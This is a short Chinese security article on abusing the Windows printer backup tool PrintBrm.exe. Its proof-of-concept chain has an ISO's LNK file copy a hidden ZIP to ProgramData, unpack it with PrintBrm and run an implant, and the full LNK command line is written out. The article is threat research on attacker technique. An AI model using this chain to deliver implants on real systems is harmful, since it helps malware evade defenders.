关于 PrintBrm.exe
-
PrintBrm.exe – 打印机备份恢复迁移工具
-
路径:%windir%System32spooltoolsPrintBrm.exe
-
用于从 ZIP 存档中提取文件
-
因此,LOLBIN
概念证明
看到了以下推文,其中威胁者使用 PrintBrm 提取并执行植入。考虑为其创建一个 PoC。https://twitter.com/h2jazi/status/1638923200527474691
感染链
-
以包含 LNK 文件以及隐藏的 ZIP 存档的 ISO 文件开始。
-
一旦 LNK 文件被执行。
-
它将 ZIP 存档复制到 ProgramData 中 -
使用 PrintBrm.exe 将存档中的文件提取到 ProgramData 中的另一个文件夹中 -
提取的文件“USO.exe”是植入程序,然后由 LNK 文件执行。
-
可以从“PoC-ISO”文件夹下载演示以下感染链的概念验证 ISO 文件
注意:在这种情况下,应使用用法中提到的命令从 PrintBrm 实用程序生成 ZIP 存档
LNK 文件的参数:
%windir%/system32/cmd.exe /c xcopy .USO.zip %programdata% /h /y && %windir%System32spooltoolsPrintBrm.exe -r -f %programdata%USO.zip -d %programdata%usosharingdriver && start %programdata%usosharingdriverUSO.exe
用法-PrintBrm.exe
-r - Restore the configuration in the file to the server.-f file_name The backup file.-d directory Unpack the backup file to the directory (with -r),or repack a backup file from the directory (with -b).PrintBrm CommandsPack the files from the Directory to ZIPPrintBrm.exe -b -f <out_zip_path> -d <directory_to_pack>Unpack the ZIP to the DirectoryPrintBrm.exe -r -f <unpack_zip_path> -d <unpack_files_directory_path>
https://github.com/knight0x07/PoC-Malware-TTPs/tree/main/PrintBrm-Impant-Exec
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):通过打印机备份工具执行植入恶意EXE工具
